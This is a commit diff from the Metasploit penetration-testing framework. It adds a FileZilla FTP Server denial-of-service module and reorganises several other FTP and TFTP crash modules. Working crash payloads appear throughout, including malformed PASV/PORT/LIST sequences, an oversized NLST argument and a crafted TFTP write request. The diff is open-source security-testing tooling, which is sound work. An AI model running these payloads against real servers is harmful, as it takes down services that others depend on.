Added aux filezilla_server_port.rb. Moved dos aux to OS-based folder.

git-svn-id: file:///home/svn/framework3/trunk@6095 4d416f70-5f16-0410-b530-b9f4589650da
2009-01-09 05:33:26 +00:00 · 2009-01-09 05:33:26 +00:00 · 0b9e8cd2b9
parent 2de1dc9947
commit 0b9e8cd2b9
8 changed files with 128 additions and 41 deletions
--- a/modules/auxiliary/dos/http/webrick_regex.rb
+++ b/modules/auxiliary/dos/http/webrick_regex.rb
@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/ 
+##
+
 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary
@ -16,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         => 'kris',
 			'License'        => MSF_LICENSE,
-			'Version'        => '1',
+			'Version'        => '$Revision$',
 			'References'     => [
 				[ 'BID', '30644'],
 				[ 'CVE', '2008-3656'],
--- a/modules/auxiliary/dos/tftp/pt360_write.rb
+++ b/modules/auxiliary/dos/tftp/pt360_write.rb
@ -1,32 +0,0 @@
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
-	include Msf::Exploit::Remote::Udp
-	include Msf::Auxiliary::Dos
-	
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
-			'Description'    => %q{
-				The PacketTrap TFTP server version 2.2.5459.0 can be
-				brought down by sending a special write request.
-			},
-			'Author'         => 'kris',
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[ [ 'URL', 'http://milw0rm.com/exploits/6863'] ],
-			'DisclosureDate' => 'Oct 29 2008'))
-
-		register_options([Opt::RPORT(69)])
-	end
-
-	def run
-		connect_udp
-		print_status("Sending write request...")
-		udp_sock.put("\x00\x02|\x00netascii\x00")
-		disconnect_udp
-	end
-end
-
--- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
+++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
@ -0,0 +1,52 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/ 
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Ftp
+	include Msf::Auxiliary::Dos
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'		=> 'FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service',
+			'Description'	=> %q{
+				This module triggers a Denial of Service condition in the FileZilla FTP
+				Server versions 0.9.21 and earlier. By sending a malformed PORT command
+				then LIST command, the server attempts to write to a NULL pointer.
+			},
+			'Author' 		=> [ 'patrick' ],
+			'License'        	=> MSF_LICENSE,
+			'Version'        	=> '$Revision$',
+			'References'     =>
+				[
+					[ 'BID', '21542' ],
+					[ 'BID', '21549' ],
+					[ 'CVE', '2006-6565' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/2914' ],
+					[ 'OSVDB', '34435' ],
+				],
+			'DisclosureDate' => 'Dec 11 2006'))
+	end
+
+	def run
+		connect_login
+
+		send_cmd(['PASV', 'A*'], true) # Assigns PASV port
+		send_cmd(['PORT', 'A*'], true) # Rejected but seems to assign NULL to pointer
+		send_cmd(['LIST'], true) # Try and push data to NULL port, trigger crash :)
+
+		disconnect
+	end
+
+end
--- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
+++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/ 
+##
+
 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary
@ -15,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         => 'kris',
 			'License'        => MSF_LICENSE,
-			'Version'        => '1',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[ [ 'URL', 'http://milw0rm.com/exploits/6738'] ],
 			'DisclosureDate' => 'Oct 12 2008'))
--- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb
+++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb
@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/ 
+##
+
 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary
@ -15,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         => 'kris',
 			'License'        => MSF_LICENSE,
-			'Version'        => '1',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[ [ 'URL', 'http://milw0rm.com/exploits/6753'] ],
 			'DisclosureDate' => 'Oct 14 2008'))
@ -31,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
 		return unless connect_login
 		print_status("Sending command...")
 		raw_send("SITE WHO\r\n")
-		sleep 1
+		sleep(1)
 		disconnect
 	end
 end
--- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
+++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/ 
+##
+
+
 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary
@ -16,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision$',
 			'References'     =>
-				[ [ 'URL', 'http://milw0rm.com/exploits/6834'] ],
+				[ [ 'URL', 'http://milw0rm.com/exploits/6834' ] ],
 			'DisclosureDate' => 'Oct 24 2008'))

 		# They're required
--- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/ 
+##
+
 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary
@ -15,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         => 'kris',
 			'License'        => MSF_LICENSE,
-			'Version'        => '1',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[ [ 'URL', 'http://milw0rm.com/exploits/6581'] ],
 			'DisclosureDate' => 'Sep 26 2008'))
@ -26,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary

 		raw_send_recv("PASV\r\n") # NLST has to follow a PORT or PASV

-		sleep 1 # *sigh* this appears to be necessary in my tests
+		sleep(1) # *sigh* this appears to be necessary in my tests

 		raw_send("NLST #{'..?' * 35000}\r\n")

--- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
@ -1,3 +1,14 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/ 
+##
+
 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary
@ -15,9 +26,9 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         => 'kris',
 			'License'        => MSF_LICENSE,
-			'Version'        => '1',
+			'Version'        => '$Revision$',
 			'References'     =>
-				[ [ 'URL', 'http://milw0rm.com/exploits/6741'] ],
+				[ [ 'URL', 'http://milw0rm.com/exploits/6741' ] ],
 			'DisclosureDate' => 'Oct 13 2008'))

 		# They're required